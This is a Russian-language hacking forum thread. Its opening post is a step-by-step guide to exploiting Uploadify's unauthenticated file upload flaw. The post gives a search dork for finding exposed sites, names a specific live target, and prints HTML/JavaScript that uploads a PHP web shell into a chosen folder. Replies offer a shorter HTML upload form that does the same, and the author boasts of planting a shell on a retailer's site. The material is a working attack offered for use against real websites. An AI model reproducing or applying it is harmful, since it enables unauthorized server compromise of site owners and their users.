Uploadify Remote File Upload Я до этого дня считал, что это 0day =) Потом поискал на сайте "элитного дня". Нашел... Но там по другому все написано. Поехали! Открываем Opera. Для начала по дорку intitle:"Index of uploadify" ищем сайты. Результатов: примерно 10 600 (0,38 сек.) ^__^ Заходим по любой ссылке. Зашли, например, по ссылке http://parsoniiseo.com/uploadify/ На их сайте (http://www.uploadify.com/documentation/) любезно дан "exploit", точнее код установки uploadify: Code: <script type="text/javascript" src="/uploadify/jquery-1.4.2.min.js"></script> <script type="text/javascript" src="/uploadify/swfobject.js"></script> <script type="text/javascript" src="/uploadify/jquery.uploadify.v2.1.4.min.js"></script> <script type="text/javascript"> // <![CDATA[ $(document).ready(function() { $('#file_upload').uploadify({ 'uploader' : '/uploadify/uploadify.swf', 'script' : '/uploadify/uploadify.php', 'cancelImg' : '/uploadify/cancel.png', 'folder' : '/uploads', 'auto' : true }); }); // ]]> </script> -------- Потом в нужном месте ставим: <input id="file_upload" type="file" name="file_upload" /> Правим код, точнее версии jquery как на уязвимом сайте. Так же можно последние версии этих файлов залить себе на хостинг, и не замарачиватся с версиями, а просто ставить ссылку на скрипт на вашем хостинге. Открываем исходный код страницы(Ctrl+U). Меняем... Исходный код у меня получился таким: Code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"> <HTML> <HEAD> <TITLE>Index of /uploadify</TITLE> <script type="text/javascript" src="jquery-1.4.2.min.js"></script> <script type="text/javascript" src="swfobject.js"></script> <script type="text/javascript" src="jquery.uploadify.v2.1.4.min.js"></script> <script type="text/javascript"> // <![CDATA[ $(document).ready(function() { $('#file_upload').uploadify({ 'uploader' : 'uploadify.swf', 'script' : 'uploadify.php', 'cancelImg' : 'cancel.png', 'folder' : '../imgadmin/phpimages/', 'auto' : true }); }); // ]]> </script> </HEAD> <BODY> <input id="file_upload" type="file" name="file_upload" /> <h1>By Ereee</h1> </body></html> Перейдем по ссылке: http://parsoniiseo.com/imgadmin/phpimages/ Появился файл bbd680520ce0807131688e164c11fdcf.php. Опять перейдем, это ведь наш шелл) Всем спасибо! Читайте мой блог =) Оригинал по адресу: http://dbitems.ru/blog/?x=entry:entry120328-063852
0day всех нуллдеев http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=Uploadify Как такое можно писать, точнее для кого?
Поставь фильтры, отредактировав uploadify.php. Я уже писал, что баян. Но там не написано как заливать, ведь, если смотреть, то на многих сайтах нет папки /files/. P.S. Забыл добавить. Я этим способом на сайт Евросети шелл заливал. Т.е. этот недочет еще многие не исправили.
Радуешь с каждым днём, молодец! Code: Вы должны добавить репутацию кому-то еще, прежде чем сможете снова добавить ее Ereee.
Зиродей ороро. Зачем весь этот говнокод? Все это можно заменить на простейшую форму без всяких скриптов. HTML: <form action="http://example.com/uploadify.php" method="post" enctype="multipart/form-data"> File: <input type="file" name="Filedata"><br />Folder: <input type="text" name="folder"> <input type="submit" value="Submit"></form>
Было бы интересно почитать, баги в скриптах кмс'ок, которые ты именно нашел, причем там не инклуд, иньект, а например код экзэкъюшен. Причем подробно, как происходил анализ, на что в первую очередь обратил внимание, именно теорию анализа мышления хотелось бы почитать.
А так же удалять и переименовывать. M_Script, крутой 0day, конечно. Вот только без пароля никуда не годится.